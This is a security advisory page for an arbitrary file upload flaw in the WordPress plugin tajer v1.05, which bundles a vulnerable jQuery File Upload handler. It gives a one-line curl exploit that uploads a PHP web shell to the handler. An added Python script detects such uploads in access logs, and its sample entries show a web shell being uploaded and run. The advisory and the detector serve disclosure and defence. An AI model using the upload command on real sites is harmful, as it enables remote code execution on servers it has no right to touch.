WordPress Plugin tajer v1.05 Arbitrary file upload vulnerability

2018.10.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-15 [CVE-2018-9206]
Download Site: https://wordpress.org/plugins/tajer
Vendor: https://mostasharoon.org/
Vendor Notified: no
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=205

Description:
Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.

Vulnerability:
This plugin bundles components of Blueimp's jQuery File Upload that are vulnerable to arbitrary file upload and code execution.

Exploit Code:
curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php
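Added example, not part of the advisory: a Python check a site operator can run over Apache combined-format access logs to flag POSTs to the bundled upload handler path named above, and any later request that executes a PHP file from that handler's `files/` directory. The `files/` upload directory is an assumption about the Blueimp server-side handler's default layout, not something stated on the page; the log lines are constructed.

```python
import re
from typing import Dict, List, Optional

# Apache combined log format: host ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Bundled handler path from the advisory (any jQuery-File-Upload* folder name).
HANDLER_RE = re.compile(
    r'/jQuery-File-Upload[^/]*/server/php/(index\.php)?(\?.*)?$', re.I)
# Assumption: the handler stores uploads in a sibling files/ directory; a PHP
# file being requested from there is the post-upload execution we want to see.
FILES_RE = re.compile(
    r'/jQuery-File-Upload[^/]*/server/php/files/[^/]+\.(php\d?|phtml|phar)(\?.*)?$', re.I)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_handler_activity(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line that touches the bundled upload handler."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and HANDLER_RE.search(rec["path"]):
            findings.append({**rec, "reason": "upload to bundled jQuery-File-Upload handler"})
        elif FILES_RE.search(rec["path"]):
            findings.append({**rec, "reason": "php executed from handler upload directory"})
    return findings


# Constructed sample log (not real traffic): login, upload, execution, harmless image fetch.
SAMPLE_LOG = [
    '203.0.113.9 - - [18/Oct/2018:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Oct/2018:10:01:05 +0000] "POST /wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php HTTP/1.1" 200 310 "-" "curl/7.61.0"',
    '203.0.113.9 - - [18/Oct/2018:10:01:09 +0000] "GET /wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/shell.php HTTP/1.1" 200 58 "-" "curl/7.61.0"',
    '198.51.100.4 - - [18/Oct/2018:10:02:00 +0000] "GET /wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/photo.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_upload_handler_activity(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['method']} {f['path']} -> {f['reason']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a POST to the handler followed by a request for a .php file in files/ from the same host is the sequence worth escalating.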

References:

http://www.vapidlabs.com/advisory.php?v=205


Copyright 2019, cxsecurity.com
